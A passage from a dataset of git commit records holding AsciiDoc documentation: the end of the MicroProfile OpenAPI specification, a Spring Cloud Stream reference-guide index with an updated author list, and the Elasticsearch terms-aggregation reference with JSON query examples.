Vendors\nare required to process these different sources in the following order:\n\n1. Fetch configuration values from `mp.openapi` namespace\n2. Call OASModelReader\n3. Fetch static OpenAPI file\n4. Process annotations\n5. Filter model via OASFilter\n\n**Example processing**:\n\n* A vendor starts by fetching all available <<Configuration>>. 
If\nan `OASModelReader` was specified in that configuration list, its `buildModel`\nmethod is called to form the starting OpenAPI model tree for this application.\n* Any <<Vendor specific configuration>> are added on top of that starting model (overriding\nconflicts), or create a new model if an `OASModelReader` was not registered.\n* The vendor searches for a file as defined in the section <<Static OpenAPI files>>.\nIf found, it will read that document and merge with the model produced by previous\nprocessing steps (if any), where conflicting elements from the static file will override\nthe values from the original model.\n* If annotation scanning was not disabled, the JAX-RS and OpenAPI annotations from\nthe application will be processed, further overriding any conflicting elements\nfrom the current model.\n* The final model is filtered by walking the model tree and invoking all registered\n<<OASFilter>> classes.\n\n== OpenAPI Endpoint\n\n=== Overview\nA fully processed and valid OpenAPI document must be available at the root\nURL `\/openapi`, as a `HTTP GET` operation.\n\nFor example, `GET http:\/\/myHost:myPort\/openapi`.\n\nThis document represents the result of the applied <<Processing rules>>.\n\nThe protocol required is `http`. Vendors are encouraged, but not required, to\nsupport the `https` protocol as well, to enable a secure connection to the OpenAPI\nendpoint.\n\n=== Content format\nThe default format of the `\/openapi` endpoint is `YAML`.\n\nVendors must also support the `JSON` format if the request contains an `Accept`\nheader with a value of `application\/json`, in which case the response must contain\na `Content-Type` header with value of `application\/json`.\n\n=== Query parameters\nNo query parameters are required for the `\/openapi` endpoint. However, one\nsuggested but optional query parameter for vendors to support is `format`,\nwhere the value can be either `json` or `yaml`, to facilitate the toggle between\nthe default `yaml` format and `json` format.\n\n=== Context root behaviour\nVendors are required to ensure that the combination of each global https:\/\/github.com\/OAI\/OpenAPI-Specification\/blob\/master\/versions\/3.0.0.md#serverObject[server]\nelement and https:\/\/github.com\/OAI\/OpenAPI-Specification\/blob\/master\/versions\/3.0.0.md#pathItemObject[pathItem] element resolve to the absolute backend URL of that\nparticular path. If that `pathItem` contains a `servers` element , then this\nlist of operation-level `server` elements replaces the global list of servers\nfor that particular `pathItem`.\n\nFor example: an application may have an `ApplicationPath` annotation with the\nvalue of `\/`, but is assigned the context root of `\/myApp` during deployment. In\nthis case, the `server` elements (either global or operation-level) must either\nend with `\/myApp` or a corresponding proxy. Alternatively it is valid, but discouraged, to\nadd that context root (`\/myApp`) to every `pathItem` defined in that application.\n\n=== Multiple applications\n\nThe 1.0 version of the MicroProfile OpenAPI specification does not define how\nthe `\/openapi` endpoint may be partitioned in the event that the MicroProfile\nruntime supports deployment of multiple applications. 
If an implementation wishes\nto support multiple applications within a MicroProfile runtime, the semantics of\nthe `\/openapi` endpoint are expected to be the logical AND of all the applications\nin the runtime, which would imply merging multiple OpenAPI documents into a single\nvalid document (handling conflicting IDs and unique names).\n\n\n== Limitations\n\n=== Internationalization\nThe 1.0 version of the MicroProfile OpenAPI spec does not require vendors to\nsupport multiple languages based on the `Accept-Language`. One reasonable\napproach is for vendors to support unique keys (instead of hardcoded text) via\nthe various <<Documentation Mechanisms>>, so that the implementing framework can\nperform a global replacement of the keys with the language-specific text that\nmatches the `Accept-Language` request for the `\/openapi` endpoint. A cache of\nprocessed languages can be kept to improve performance.\n\n=== Validation\n\nThe MP OpenAPI 1.0 specification does not mandate vendors to validate the resulting\nOpenAPI v3 model (after processing the 5 steps previously mentioned), which means\nthat the behavior of invalid models is vendor specific (i.e. vendors may choose to\nignore, reject, or pass-through invalid inputs).\n\n=== Cross Origin Resource Sharing (CORS)\n\nThe MP OpenAPI 1.0 specification does not require vendors to support https:\/\/www.w3.org\/TR\/cors\/[CORS]\nfor the `\/openapi` endpoint. The behavior of CORS requests is implementation dependent.\n\ninclude::release_notes.asciidoc[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1b09023b845de25ad72fa940685756b24a4f218c","subject":"Fix author list","message":"Fix author list\n","repos":"spring-cloud\/spring-cloud-stream,garyrussell\/spring-cloud-stream,garyrussell\/spring-cloud-stream,garyrussell\/spring-cloud-stream,spring-cloud\/spring-cloud-stream,spring-cloud\/spring-cloud-stream","old_file":"spring-cloud-stream-docs\/src\/main\/asciidoc\/index.adoc","new_file":"spring-cloud-stream-docs\/src\/main\/asciidoc\/index.adoc","new_contents":"[[spring-cloud-stream-reference]]\n= Spring Cloud Stream Reference Guide\nSabby Anandan; Marius Bogoevici; Eric Bottard; Mark Fisher; Ilayaperumal Gopinathan; Gunnar Hillert; Mark Pollack; Patrick Peralta; Glenn Renfro; Thomas Risberg; Dave Syer; David Turanski; Janne Valkealahti; Benjamin Klein; Soby Chacko; Vinicius Carvalho\n:doctype: book\n:toc:\n:toclevels: 4\n:source-highlighter: prettify\n:numbered:\n:icons: font\n:hide-uri-scheme:\n:spring-cloud-stream-repo: snapshot\n:github-tag: master\n:spring-cloud-stream-docs-version: current\n:spring-cloud-stream-docs: http:\/\/docs.spring.io\/spring-cloud-stream\/docs\/{spring-cloud-stream-docs-version}\/reference\n:spring-cloud-stream-docs-current: http:\/\/docs.spring.io\/spring-cloud-stream\/docs\/current-SNAPSHOT\/reference\/html\/\n:github-repo: spring-cloud\/spring-cloud-stream\n:github-raw: http:\/\/raw.github.com\/{github-repo}\/{github-tag}\n:github-code: http:\/\/github.com\/{github-repo}\/tree\/{github-tag}\n:github-wiki: http:\/\/github.com\/{github-repo}\/wiki\n:github-master-code: http:\/\/github.com\/{github-repo}\/tree\/master\n:sc-ext: java\n\/\/ ======================================================================================\n\n= Spring Cloud Stream Core\n:stream-docs-basedir: ..\/..\/..\ninclude::spring-cloud-stream-aggregate.adoc[]\n\n= Appendices\n[appendix]\ninclude::building.adoc[]\ninclude::contributing.adoc[]\n\n\/\/ 
======================================================================================\n","old_contents":"[[spring-cloud-stream-reference]]\n= Spring Cloud Stream Reference Guide\nSabby Anandan; Marius Bogoevici; Eric Bottard; Mark Fisher; Ilayaperumal Gopinathan; Gunnar Hillert; Mark Pollack; Patrick Peralta; Glenn Renfro; Thomas Risberg; Dave Syer; David Turanski; Janne Valkealahti; Benjamin Klein\n:doctype: book\n:toc:\n:toclevels: 4\n:source-highlighter: prettify\n:numbered:\n:icons: font\n:hide-uri-scheme:\n:spring-cloud-stream-repo: snapshot\n:github-tag: master\n:spring-cloud-stream-docs-version: current\n:spring-cloud-stream-docs: http:\/\/docs.spring.io\/spring-cloud-stream\/docs\/{spring-cloud-stream-docs-version}\/reference\n:spring-cloud-stream-docs-current: http:\/\/docs.spring.io\/spring-cloud-stream\/docs\/current-SNAPSHOT\/reference\/html\/\n:github-repo: spring-cloud\/spring-cloud-stream\n:github-raw: http:\/\/raw.github.com\/{github-repo}\/{github-tag}\n:github-code: http:\/\/github.com\/{github-repo}\/tree\/{github-tag}\n:github-wiki: http:\/\/github.com\/{github-repo}\/wiki\n:github-master-code: http:\/\/github.com\/{github-repo}\/tree\/master\n:sc-ext: java\n\/\/ ======================================================================================\n\n= Spring Cloud Stream Core\n:stream-docs-basedir: ..\/..\/..\ninclude::spring-cloud-stream-aggregate.adoc[]\n\n= Appendices\n[appendix]\ninclude::building.adoc[]\ninclude::contributing.adoc[]\n\n\/\/ ======================================================================================\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c17d14e382a6e38f094b9d099dc7123d11679dd0","subject":"[docs]\u00a0Fix typo: resonable - reasonable","message":"[docs]\u00a0Fix typo: resonable - reasonable","repos":"fubuki\/elasticsearch,aparo\/elasticsearch,aparo\/elasticsearch,fubuki\/elasticsearch,aparo\/elasticsearch,fubuki\/elasticsearch,fubuki\/elasticsearch,fubuki\/elasticsearch,aparo\/elasticsearch,aparo\/elasticsearch,aparo\/elasticsearch,fubuki\/elasticsearch","old_file":"docs\/reference\/search\/aggregations\/bucket\/terms-aggregation.asciidoc","new_file":"docs\/reference\/search\/aggregations\/bucket\/terms-aggregation.asciidoc","new_contents":"[[search-aggregations-bucket-terms-aggregation]]\n=== Terms Aggregation\n\nA multi-bucket value source based aggregation where buckets are dynamically built - one per unique value.\n\nExample:\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"genders\" : {\n \"terms\" : { \"field\" : \"gender\" }\n }\n }\n}\n--------------------------------------------------\n\nResponse:\n\n[source,js]\n--------------------------------------------------\n{\n ...\n\n \"aggregations\" : {\n \"genders\" : {\n \"buckets\" : [\n {\n \"key\" : \"male\",\n \"doc_count\" : 10\n },\n {\n \"key\" : \"female\",\n \"doc_count\" : 10\n },\n ]\n }\n }\n}\n--------------------------------------------------\n\nBy default, the `terms` aggregation will return the buckets for the top ten terms ordered by the `doc_count`. One can\nchange this default behaviour by setting the `size` parameter.\n\n==== Size\n\nThe `size` parameter can be set to define how many term buckets should be returned out of the overall terms list. 
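For instance, the following request sketch (using an illustrative `tags` field, in the same style as the samples in this document) would keep only the three most frequent terms:\n\n[source,js]\n----\n{\n \"aggs\" : {\n \"tags\" : {\n \"terms\" : {\n \"field\" : \"tags\",\n \"size\" : 3\n }\n }\n }\n}\n----\n\n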
By\ndefault, the node coordinating the search process will request each shard to provide its own top `size` term buckets\nand once all shards respond, it will reduce the results to the final list that will then be returned to the client.\nThis means that if the number of unique terms is greater than `size`, the returned list is slightly off and not accurate\n(it could be that the term counts are slightly off and it could even be that a term that should have been in the top\nsize buckets was not returned). If set to `0`, the `size` will be set to `Integer.MAX_VALUE`.\n\n==== Document counts are approximate\n\nAs described above, the document counts (and the results of any sub aggregations) in the terms aggregation are not always\naccurate. This is because each shard provides its own view of what the ordered list of terms should be and these are\ncombined to give a final view. Consider the following scenario:\n\nA request is made to obtain the top 5 terms in the field product, ordered by descending document count from an index with\n3 shards. In this case each shard is asked to give its top 5 terms.\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"products\" : {\n \"terms\" : {\n \"field\" : \"product\",\n \"size\" : 5\n }\n }\n }\n}\n--------------------------------------------------\n\nThe terms for each of the three shards are shown below with their\nrespective document counts in brackets:\n\n[width=\"100%\",cols=\"^2,^2,^2,^2\",options=\"header\"]\n|=========================================================\n| | Shard A | Shard B | Shard C\n\n| 1 | Product A (25) | Product A (30) | Product A (45)\n| 2 | Product B (18) | Product B (25) | Product C (44)\n| 3 | Product C (6) | Product F (17) | Product Z (36)\n| 4 | Product D (3) | Product Z (16) | Product G (30)\n| 5 | Product E (2) | Product G (15) | Product E (29)\n| 6 | Product F (2) | Product H (14) | Product H (28)\n| 7 | Product G (2) | Product I (10) | Product Q (2)\n| 8 | Product H (2) | Product Q (6) | Product D (1)\n| 9 | Product I (1) | Product J (8) |\n| 10 | Product J (1) | Product C (4) |\n\n|=========================================================\n\nThe shards will return their top 5 terms so the results from the shards will be:\n\n\n[width=\"100%\",cols=\"^2,^2,^2,^2\",options=\"header\"]\n|=========================================================\n| | Shard A | Shard B | Shard C\n\n| 1 | Product A (25) | Product A (30) | Product A (45)\n| 2 | Product B (18) | Product B (25) | Product C (44)\n| 3 | Product C (6) | Product F (17) | Product Z (36)\n| 4 | Product D (3) | Product Z (16) | Product G (30)\n| 5 | Product E (2) | Product G (15) | Product E (29)\n\n|=========================================================\n\nTaking the top 5 results from each of the shards (as requested) and combining them to make a final top 5 list produces\nthe following:\n\n[width=\"40%\",cols=\"^2,^2\"]\n|=========================================================\n\n| 1 | Product A (100)\n| 2 | Product Z (52)\n| 3 | Product C (50)\n| 4 | Product G (45)\n| 5 | Product B (43)\n\n|=========================================================\n\nBecause Product A was returned from all shards we know that its document count value is accurate. Product C was only\nreturned by shards A and C so its document count is shown as 50 but this is not an accurate count. Product C exists on\nshard B, but its count of 4 was not high enough to put Product C into the top 5 list for that shard. 
Product Z was also\nreturned only by 2 shards but the third shard does not contain the term. There is no way of knowing, at the point of\ncombining the results to produce the final list of terms, that there is an error in the document count for Product C and\nnot for Product Z. Product H has a document count of 44 across all 3 shards but was not included in the final list of\nterms because it did not make it into the top five terms on any of the shards.\n\n==== Shard Size\n\nThe higher the requested `size` is, the more accurate the results will be, but also, the more expensive it will be to\ncompute the final results (both due to bigger priority queues that are managed on a shard level and due to bigger data\ntransfers between the nodes and the client).\n\nThe `shard_size` parameter can be used to minimize the extra work that comes with a bigger requested `size`. When defined,\nit will determine how many terms the coordinating node will request from each shard. Once all the shards have responded, the\ncoordinating node will then reduce them to a final result which will be based on the `size` parameter - this way,\none can increase the accuracy of the returned terms and avoid the overhead of streaming a big list of buckets back to\nthe client. If set to `0`, the `shard_size` will be set to `Integer.MAX_VALUE`.\n\n\nNOTE: `shard_size` cannot be smaller than `size` (as it doesn't make much sense). When it is, elasticsearch will\n override it and reset it to be equal to `size`.\n\nadded[1.1.0] It is possible to not limit the number of terms that are returned by setting `size` to `0`. Don't use this\non high-cardinality fields as this will kill both your CPU, since terms need to be returned sorted, and your network.\n\n==== Calculating Document Count Error\n\ncoming[1.4.0]\n\nThere are two error values which can be shown on the terms aggregation. The first gives a value for the aggregation as\na whole which represents the maximum potential document count for a term which did not make it into the final list of\nterms. This is calculated as the sum of the document count from the last term returned from each shard. For the example\ngiven above the value would be 46 (2 + 15 + 29). This means that in the worst case scenario a term which was not returned\ncould have the 4th highest document count.\n\n[source,js]\n----\n{\n ...\n\n \"aggregations\" : {\n \"products\" : {\n \"doc_count_error_upper_bound\" : 46,\n \"buckets\" : [\n {\n \"key\" : \"Product A\",\n \"doc_count\" : 100\n },\n {\n \"key\" : \"Product Z\",\n \"doc_count\" : 52\n },\n ...\n ]\n }\n }\n}\n----\n\nThe second error value can be enabled by setting the `show_term_doc_count_error` parameter to true. This shows an error value\nfor each term returned by the aggregation which represents the 'worst case' error in the document count and can be useful when\ndeciding on a value for the `shard_size` parameter. This is calculated by summing the document counts for the last term returned\nby all shards which did not return the term. In the example above the error in the document count for Product C would be 15 as\nShard B was the only shard not to return the term and the document count of the last term it did return was 15. The actual document\ncount of Product C was 54 so the document count was only actually off by 4 even though the worst case was that it would be off by\n15. 
Product A, however, has an error of 0 for its document count; since every shard returned it, we can be confident that the count\nreturned is accurate.\n\n[source,js]\n----\n{\n ...\n\n \"aggregations\" : {\n \"products\" : {\n \"doc_count_error_upper_bound\" : 46,\n \"buckets\" : [\n {\n \"key\" : \"Product A\",\n \"doc_count\" : 100,\n \"doc_count_error_upper_bound\" : 0\n },\n {\n \"key\" : \"Product Z\",\n \"doc_count\" : 52,\n \"doc_count_error_upper_bound\" : 2\n },\n ...\n ]\n }\n }\n}\n----\n\nThese errors can only be calculated in this way when the terms are ordered by descending document count. When the aggregation is\nordered by the term values themselves (either ascending or descending) there is no error in the document count since if a shard\ndoes not return a particular term which appears in the results from another shard, it must not have that term in its index. When the\naggregation is either sorted by a sub aggregation or in order of ascending document count, the error in the document counts cannot be\ndetermined and is given a value of -1 to indicate this.\n\n==== Order\n\nThe order of the buckets can be customized by setting the `order` parameter. By default, the buckets are ordered by\ntheir `doc_count` descending. It is also possible to change this behaviour as follows:\n\nOrdering the buckets by their `doc_count` in an ascending manner:\n\n[source,js]\n----\n{\n \"aggs\" : {\n \"genders\" : {\n \"terms\" : {\n \"field\" : \"gender\",\n \"order\" : { \"_count\" : \"asc\" }\n }\n }\n }\n}\n----\n\nOrdering the buckets alphabetically by their terms in an ascending manner:\n\n[source,js]\n----\n{\n \"aggs\" : {\n \"genders\" : {\n \"terms\" : {\n \"field\" : \"gender\",\n \"order\" : { \"_term\" : \"asc\" }\n }\n }\n }\n}\n----\n\n\nOrdering the buckets by single value metrics sub-aggregation (identified by the aggregation name):\n\n[source,js]\n----\n{\n \"aggs\" : {\n \"genders\" : {\n \"terms\" : {\n \"field\" : \"gender\",\n \"order\" : { \"avg_height\" : \"desc\" }\n },\n \"aggs\" : {\n \"avg_height\" : { \"avg\" : { \"field\" : \"height\" } }\n }\n }\n }\n}\n----\n\nOrdering the buckets by multi value metrics sub-aggregation (identified by the aggregation name):\n\n[source,js]\n----\n{\n \"aggs\" : {\n \"genders\" : {\n \"terms\" : {\n \"field\" : \"gender\",\n \"order\" : { \"height_stats.avg\" : \"desc\" }\n },\n \"aggs\" : {\n \"height_stats\" : { \"stats\" : { \"field\" : \"height\" } }\n }\n }\n }\n}\n----\n\nIt is also possible to order the buckets based on a \"deeper\" aggregation in the hierarchy. This is supported as long\nas the aggregations in the path are of a single-bucket type, where the last aggregation in the path may either be a single-bucket\none or a metrics one. If it's a single-bucket type, the order will be defined by the number of docs in the bucket (i.e. 
`doc_count`),\nin case it's a metrics one, the same rules as above apply (where the path must indicate the metric name to sort by in case of\na multi-value metrics aggregation, and in case of a single-value metrics aggregation the sort will be applied on that value).\n\nThe path must be defined in the following form:\n\n--------------------------------------------------\nAGG_SEPARATOR := '>'\nMETRIC_SEPARATOR := '.'\nAGG_NAME := <the name of the aggregation>\nMETRIC := <the name of the metric (in case of multi-value metrics aggregation)>\nPATH := <AGG_NAME>[<AGG_SEPARATOR><AGG_NAME>]*[<METRIC_SEPARATOR><METRIC>]\n--------------------------------------------------\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"countries\" : {\n \"terms\" : {\n \"field\" : \"address.country\",\n \"order\" : { \"females>height_stats.avg\" : \"desc\" }\n },\n \"aggs\" : {\n \"females\" : {\n \"filter\" : { \"term\" : { \"gender\" : { \"female\" }}},\n \"aggs\" : {\n \"height_stats\" : { \"stats\" : { \"field\" : \"height\" }}\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\nThe above will sort the countries buckets based on the average height among the female population.\n\n==== Minimum document count\n\nIt is possible to only return terms that match more than a configured number of hits using the `min_doc_count` option:\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"tags\" : {\n \"terms\" : {\n \"field\" : \"tag\",\n \"min_doc_count\": 10\n }\n }\n }\n}\n--------------------------------------------------\n\nThe above aggregation would only return tags which have been found in 10 hits or more. Default value is `1`.\n\n\nTerms are collected and ordered on a shard level and merged with the terms collected from other shards in a second step. However, the shard does not have the information about the global document count available. The decision if a term is added to a candidate list depends only on the order computed on the shard using local shard frequencies. The `min_doc_count` criterion is only applied after merging local terms statistics of all shards. In a way the decision to add the term as a candidate is made without being very _certain_ about if the term will actually reach the required `min_doc_count`. This might cause many (globally) high frequent terms to be missing in the final result if low frequent terms populated the candidate lists. To avoid this, the `shard_size` parameter can be increased to allow more candidate terms on the shards. However, this increases memory consumption and network traffic.\n\nadded[1.2.0] `shard_min_doc_count` parameter\n\nThe parameter `shard_min_doc_count` regulates the _certainty_ a shard has if the term should actually be added to the candidate list or not with respect to the `min_doc_count`. Terms will only be considered if their local shard frequency within the set is higher than the `shard_min_doc_count`. If your dictionary contains many low frequent terms and you are not interested in those (for example misspellings), then you can set the `shard_min_doc_count` parameter to filter out candidate terms on a shard level that will with a reasonable certainty not reach the required `min_doc_count` even after merging the local counts. `shard_min_doc_count` is set to `0` per default and has no effect unless you explicitly set it.\n\n\n\nNOTE: Setting `min_doc_count`=`0` will also return buckets for terms that didn't match any hit. 
\nNOTE: Setting `min_doc_count`=`0` will also return buckets for terms that didn't match any hit. However, some of\n the returned terms which have a document count of zero might only belong to deleted documents, so there is\n no guarantee that a `match_all` query would find a positive document count for those terms.\n\nWARNING: When NOT sorting on `doc_count` descending, high values of `min_doc_count` may return a number of buckets\n which is less than `size` because not enough data was gathered from the shards. Missing buckets can be\n brought back by increasing `shard_size`.\n Setting `shard_min_doc_count` too high will cause terms to be filtered out on a shard level. This value should be set much lower than `min_doc_count\/#shards`.\n\n[[search-aggregations-bucket-terms-aggregation-script]]\n==== Script\n\nGenerating the terms using a script:\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"genders\" : {\n \"terms\" : {\n \"script\" : \"doc['gender'].value\"\n }\n }\n }\n}\n--------------------------------------------------\n\n==== Value Script\n\nModifying the field values with a script before the buckets are built:\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"genders\" : {\n \"terms\" : {\n \"field\" : \"gender\",\n \"script\" : \"'Gender: ' + _value\"\n }\n }\n }\n}\n--------------------------------------------------\n
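\nWith this value script, the bucket keys are the transformed values. A sketch of the resulting buckets (the counts are illustrative) could look like:\n\n[source,js]\n--------------------------------------------------\n{\n ...\n\n \"aggregations\" : {\n \"genders\" : {\n \"buckets\" : [\n {\n \"key\" : \"Gender: male\",\n \"doc_count\" : 10\n },\n {\n \"key\" : \"Gender: female\",\n \"doc_count\" : 10\n }\n ]\n }\n }\n}\n--------------------------------------------------\n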
\n\n==== Filtering Values\n\nIt is possible to filter the values for which buckets will be created. This can be done using the `include` and\n`exclude` parameters which are based on regular expressions.\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"tags\" : {\n \"terms\" : {\n \"field\" : \"tags\",\n \"include\" : \".*sport.*\",\n \"exclude\" : \"water_.*\"\n }\n }\n }\n}\n--------------------------------------------------\n\nIn the above example, buckets will be created for all the tags that have the word `sport` in them, except those starting\nwith `water_` (so the tag `water_sports` will not be aggregated). The `include` regular expression will determine what\nvalues are \"allowed\" to be aggregated, while the `exclude` determines the values that should not be aggregated. When\nboth are defined, the `exclude` takes precedence, meaning the `include` is evaluated first and only then the `exclude`.\n\nThe regular expressions are based on the Java(TM) http:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html[Pattern],\nand as such, it is also possible to pass in flags that will determine how the compiled regular expression will work:\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"tags\" : {\n \"terms\" : {\n \"field\" : \"tags\",\n \"include\" : {\n \"pattern\" : \".*sport.*\",\n \"flags\" : \"CANON_EQ|CASE_INSENSITIVE\" <1>\n },\n \"exclude\" : {\n \"pattern\" : \"water_.*\",\n \"flags\" : \"CANON_EQ|CASE_INSENSITIVE\"\n }\n }\n }\n }\n}\n--------------------------------------------------\n\n<1> the flags are concatenated using the `|` character as a separator\n\nThe possible flags that can be used are:\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html#CANON_EQ[`CANON_EQ`],\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html#CASE_INSENSITIVE[`CASE_INSENSITIVE`],\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html#COMMENTS[`COMMENTS`],\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html#DOTALL[`DOTALL`],\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html#LITERAL[`LITERAL`],\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html#MULTILINE[`MULTILINE`],\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html#UNICODE_CASE[`UNICODE_CASE`],\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html#UNICODE_CHARACTER_CLASS[`UNICODE_CHARACTER_CLASS`] and\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html#UNIX_LINES[`UNIX_LINES`]\n\n==== Multi-field terms aggregation\n\nThe `terms` aggregation does not support collecting terms from multiple fields\nin the same document. The reason is that the `terms` agg doesn't collect the\nstring term values themselves, but rather uses\n<<search-aggregations-bucket-terms-aggregation-execution-hint,global ordinals>>\nto produce a list of all of the unique values in the field. Global ordinals\nresult in an important performance boost which would not be possible across\nmultiple fields.\n\nThere are two approaches that you can use to perform a `terms` agg across\nmultiple fields:\n\n<<search-aggregations-bucket-terms-aggregation-script,Script>>::\n\nUse a script to retrieve terms from multiple fields (see the sketch after this list). This disables the global\nordinals optimization and will be slower than collecting terms from a single\nfield, but it gives you the flexibility to implement this option at search\ntime.\n\n<<copy-to,`copy_to` field>>::\n\nIf you know ahead of time that you want to collect the terms from two or more\nfields, then use `copy_to` in your mapping to create a new dedicated field at\nindex time which contains the values from both fields. You can aggregate on\nthis single field, which will benefit from the global ordinals optimization.\n
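\nAs an illustration of the script approach, the following minimal sketch (the `tags_a` and `tags_b` field names are hypothetical) builds a single terms aggregation over the values of two fields:\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"all_tags\" : {\n \"terms\" : {\n \"script\" : \"doc['tags_a'].values + doc['tags_b'].values\"\n }\n }\n }\n}\n--------------------------------------------------\n\nAs noted above, this disables the global ordinals optimization, so it will be slower than aggregating a single `copy_to` field.\n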
\n==== Collect mode\n\nadded[1.3.0] Deferring calculation of child aggregations\n\nFor fields with many unique terms and a small number of required results it can be more efficient to delay the calculation\nof child aggregations until the top parent-level aggs have been pruned. Ordinarily, all branches of the aggregation tree\nare expanded in one depth-first pass and only then any pruning occurs. In some rare scenarios this can be very wasteful and can hit memory constraints.\nAn example problem scenario is querying a movie database for the 10 most popular actors and their 5 most common co-stars:\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"actors\" : {\n \"terms\" : {\n \"field\" : \"actors\",\n \"size\" : 10\n },\n \"aggs\" : {\n \"costars\" : {\n \"terms\" : {\n \"field\" : \"actors\",\n \"size\" : 5\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\nEven though the number of movies may be comparatively small and we want only 50 result buckets, there is a combinatorial explosion of buckets\nduring calculation - a single movie will produce n\u00b2 buckets where n is the number of actors. The saner option would be to first determine\nthe 10 most popular actors and only then examine the top co-stars for these 10 actors. This alternative strategy is what we call the `breadth_first` collection\nmode as opposed to the default `depth_first` mode:\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"actors\" : {\n \"terms\" : {\n \"field\" : \"actors\",\n \"size\" : 10,\n \"collect_mode\" : \"breadth_first\"\n },\n \"aggs\" : {\n \"costars\" : {\n \"terms\" : {\n \"field\" : \"actors\",\n \"size\" : 5\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\n\nWhen using `breadth_first` mode the set of documents that fall into the uppermost buckets is\ncached for subsequent replay, so there is a memory overhead in doing this which is linear with the number of matching documents.\nIn most requests the volume of buckets generated is smaller than the number of documents that fall into them, so the default `depth_first`\ncollection mode is normally the best bet, but occasionally the `breadth_first` strategy can be significantly more efficient. Currently\nElasticsearch will always use the `depth_first` collect mode unless explicitly instructed to use `breadth_first` as in the above example.\nNote that the `order` parameter can still be used to refer to data from a child aggregation when using the `breadth_first` setting - the parent\naggregation understands that this child aggregation will need to be called first before any of the other child aggregations.\n\nWARNING: It is not possible to nest aggregations such as `top_hits` which require access to match score information under an aggregation that uses\nthe `breadth_first` collection mode. 
This is because this would require a RAM buffer to hold the float score value for every document and\nthis would typically be too costly in terms of RAM.\n\n[[search-aggregations-bucket-terms-aggregation-execution-hint]]\n==== Execution hint\n\nadded[1.2.0] Added the `global_ordinals`, `global_ordinals_hash` and `global_ordinals_low_cardinality` execution modes\n\ndeprecated[1.3.0] Removed the `ordinals` execution mode\n\nThere are different mechanisms by which terms aggregations can be executed:\n\n - by using field values directly in order to aggregate data per-bucket (`map`)\n - by using ordinals of the field and preemptively allocating one bucket per ordinal value (`global_ordinals`)\n - by using ordinals of the field and dynamically allocating one bucket per ordinal value (`global_ordinals_hash`)\n - by using per-segment ordinals to compute counts and remap these counts to global counts using global ordinals (`global_ordinals_low_cardinality`)\n\nElasticsearch tries to have sensible defaults, so this is something that generally doesn't need to be configured.\n\n`map` should only be considered when very few documents match a query. Otherwise the ordinals-based execution modes\nare significantly faster. By default, `map` is only used when running an aggregation on scripts, since they don't have\nordinals.\n\n`global_ordinals_low_cardinality` only works for leaf terms aggregations but is usually the fastest execution mode. Memory\nusage is linear with the number of unique values in the field, so it is only enabled by default on low-cardinality fields.\n\n`global_ordinals` is the second fastest option, but the fact that it preemptively allocates buckets can be memory-intensive,\nespecially if you have one or more sub aggregations. It is used by default on top-level terms aggregations.\n\n`global_ordinals_hash`, in contrast to `global_ordinals` and `global_ordinals_low_cardinality`, allocates buckets dynamically,\nso memory usage is linear in the number of values of the documents that are part of the aggregation scope. It is used by default\nin inner aggregations.\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"tags\" : {\n \"terms\" : {\n \"field\" : \"tags\",\n \"execution_hint\": \"map\" <1>\n }\n }\n }\n}\n--------------------------------------------------\n\n<1> the possible values are `map`, `global_ordinals`, `global_ordinals_hash` and `global_ordinals_low_cardinality`\n\nPlease note that Elasticsearch will ignore this execution hint if it is not applicable and that there is no backward compatibility guarantee on these hints.\n","old_contents":"[[search-aggregations-bucket-terms-aggregation]]\n=== Terms Aggregation\n\nA multi-bucket value source based aggregation where buckets are dynamically built - one per unique value.\n\nExample:\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"genders\" : {\n \"terms\" : { \"field\" : \"gender\" }\n }\n }\n}\n--------------------------------------------------\n\nResponse:\n\n[source,js]\n--------------------------------------------------\n{\n ...\n\n \"aggregations\" : {\n \"genders\" : {\n \"buckets\" : [\n {\n \"key\" : \"male\",\n \"doc_count\" : 10\n },\n {\n \"key\" : \"female\",\n \"doc_count\" : 10\n },\n ]\n }\n }\n}\n--------------------------------------------------\n\nBy default, the `terms` aggregation will return the buckets for the top ten terms ordered by the `doc_count`. 
